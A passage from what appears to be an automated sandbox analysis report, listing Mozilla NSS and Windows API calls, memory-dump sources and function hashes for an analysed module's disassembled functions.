                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C5813BC,?,?,?,6C581193), ref: 6C581C6B
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3(?,6C581193), ref: 6C581C7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,6C581193), ref: 6C581C91
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C4621BC), ref: 6C45BB8C
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,6C581193), ref: 6C581CA7
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BBEB
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C45BBFB
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: GetLastError.KERNEL32 ref: 6C45BC03
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C45BC19
                                                                                                                                                                                                                                                        • Part of subcall function 6C45BB80: free.MOZGLUE(00000000), ref: 6C45BC22
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,?,6C581193), ref: 6C581CBE
                                                                                                                                                                                                                                                      • PR_NewCondVar.NSS3(00000000,?,?,?,?,6C581193), ref: 6C581CD4
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C581193), ref: 6C581CFE
                                                                                                                                                                                                                                                      • PR_Lock.NSS3(?,?,?,?,?,?,?,6C581193), ref: 6C581D1A
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C581193), ref: 6C581D3D
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,?,6C581193), ref: 6C581D4E
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C581193), ref: 6C581D64
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C581193), ref: 6C581D6F
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C581193), ref: 6C581D7B
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(?,?,?,?,?,6C581193), ref: 6C581D87
                                                                                                                                                                                                                                                      • PR_DestroyCondVar.NSS3(00000000,?,?,?,6C581193), ref: 6C581D93
                                                                                                                                                                                                                                                      • PR_DestroyLock.NSS3(00000000,?,?,6C581193), ref: 6C581D9F
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,6C581193), ref: 6C581DA8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3246495057-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C495ECF
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C495EE3
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C495F0A
                                                                                                                                                                                                                                                      • PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C495FB5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterFromK11_MakeSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID: NSS_USE_DECODED_CKA_EC_POINT$S&Kl$S&Kl
                                                                                                                                                                                                                                                      • API String ID: 2280678669-3493570118
                                                                                                                                                                                                                                                      • Opcode ID: 9ee36f6f3421adb17eea872c6822a720a557d0ccd6e57fb83866a2d16e94dc40
                                                                                                                                                                                                                                                      • Instruction ID: b66b5fa3fdf5420d864ffc3bd8e17649cb547b83c1de77f52ed53bbac42ed9de
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ee36f6f3421adb17eea872c6822a720a557d0ccd6e57fb83866a2d16e94dc40
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97F1F4B5A002158FDB44CF19C884B86BBF4FF09304F5582AADC089B746E775EA95CF91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(*,Nl), ref: 6C4E0C81
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C4B95DC,00000000,00000000,00000000,?,6C4B95DC,00000000,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B8517
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0CC4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4E0CD5
                                                                                                                                                                                                                                                      • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C4E0D1D
                                                                                                                                                                                                                                                      • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C4E0D3B
                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C4E0D7D
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4E0DB5
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0DC1
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4E0DF7
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0E05
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C4E0E0F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B95E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B95F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C4B9609
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4B961D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: PK11_GetInternalSlot.NSS3 ref: 6C4B970B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C4B9756
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: PK11_GetIVLength.NSS3(?), ref: 6C4B9767
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C4B977E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4B978E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                      • String ID: *,Nl$*,Nl$-$Nl
                                                                                                                                                                                                                                                      • API String ID: 3136566230-2208369651
                                                                                                                                                                                                                                                      • Opcode ID: 10a9a8f5b7265a7dd45074ff60fafff3ef5e9c3c5fec30048b4b1175b9359c40
                                                                                                                                                                                                                                                      • Instruction ID: 311245155af9722638394abcdae3ef89250880e9ccdec5aab4754aa49cb646cb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10a9a8f5b7265a7dd45074ff60fafff3ef5e9c3c5fec30048b4b1175b9359c40
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1141D4B5901245ABEB00DF65DC85FAF7A74EF0430AF150128ED2967741EB35EA14CBE2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C4D5EC0,00000000,?,?), ref: 6C4D5CBE
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C4D5CD7
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C4D5CF0
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C4D5D09
                                                                                                                                                                                                                                                      • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C4D5EC0,00000000,?,?), ref: 6C4D5D1F
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C4D5D3C
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5D51
                                                                                                                                                                                                                                                      • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5D66
                                                                                                                                                                                                                                                      • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C4D5D80
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                                                      • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                                                      • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                                                      • Opcode ID: 29cd6a9d83e34a154c07f3d77fe00581a3ee771a033108f65bed3746360b8752
                                                                                                                                                                                                                                                      • Instruction ID: 931d330186d0b3dba99ce8def95e78c791b1b96b2d730fd6b643a91cf32ca69d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29cd6a9d83e34a154c07f3d77fe00581a3ee771a033108f65bed3746360b8752
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9631D4F06413416BE701AE249C78F6637A8EF0624AF264034ED55E6B81EFB1F516C2B9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C5A1DE0,?), ref: 6C4D6CFE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D6D26
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C4D6D70
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000480), ref: 6C4D6D82
                                                                                                                                                                                                                                                      • DER_GetInteger_Util.NSS3(?), ref: 6C4D6DA2
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4D6DD8
                                                                                                                                                                                                                                                      • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C4D6E60
                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C4D6F19
                                                                                                                                                                                                                                                      • PK11_DigestBegin.NSS3(00000000), ref: 6C4D6F2D
                                                                                                                                                                                                                                                      • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C4D6F7B
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C4D7011
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C4D7033
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D703F
                                                                                                                                                                                                                                                      • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C4D7060
                                                                                                                                                                                                                                                      • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C4D7087
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C4D70AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2108637330-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF25
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF39
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF51
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF69
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C49B06B
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C49B083
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C49B0A4
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C49B0C1
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C49B0D9
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C49B102
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49B151
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49B182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C49B177
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1A2
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3(?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1AA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1C2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: TlsGetValue.KERNEL32(00000000,?,6C490844,?), ref: 6C4C157A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: EnterCriticalSection.KERNEL32(?,?,?,6C490844,?), ref: 6C4C158F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C1560: PR_Unlock.NSS3(?,?,?,?,6C490844,?), ref: 6C4C15B2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4188828017-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A1860
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF), ref: 6C4A1897
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4A18AA
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A18C4
                                                                                                                                                                                                                                                      • PK11_ImportDataKey.NSS3(00000000,0000402B,00000004,0000010C,?,00000000), ref: 6C4A193F
                                                                                                                                                                                                                                                      • PK11_DeriveWithTemplate.NSS3 ref: 6C4A1979
                                                                                                                                                                                                                                                      • PK11_ExtractKeyValue.NSS3(00000000), ref: 6C4A1988
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF,psk_id_hash,0000000B), ref: 6C4A199F
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF,psk_id_hash), ref: 6C4A19A8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001), ref: 6C4A19B6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-00000018), ref: 6C4A19F2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$Item_UtilValuememcpy$CriticalEnterFreeSectionfree$AllocDataDeriveExtractImportTemplateUnlockWithZfreememset
                                                                                                                                                                                                                                                      • String ID: +@$E-v1
                                                                                                                                                                                                                                                      • API String ID: 3144289787-3744174662
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(#?Il,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C62
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C76
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(00000000,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C86
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(00000000,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492C93
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492CC6
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23,?), ref: 6C492CDA
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?,?,6C493F23), ref: 6C492CEA
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?), ref: 6C492CF7
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C48E477,?,?,?,00000001,00000000,?), ref: 6C492D4D
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C492D61
                                                                                                                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?), ref: 6C492D71
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C492D7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                      • String ID: #?Il
                                                                                                                                                                                                                                                      • API String ID: 2446853827-3645613150
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EADB1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                                                      • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C4EADF4
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C4EAE08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4EAE25
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C4EAE63
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4EAE4D
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EAE93
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C4EAECC
                                                                                                                                                                                                                                                      • PL_FreeArenaPool.NSS3 ref: 6C4EAEDE
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C4EAEE6
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4EAEF5
                                                                                                                                                                                                                                                      • PL_FinishArenaPool.NSS3 ref: 6C4EAF16
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
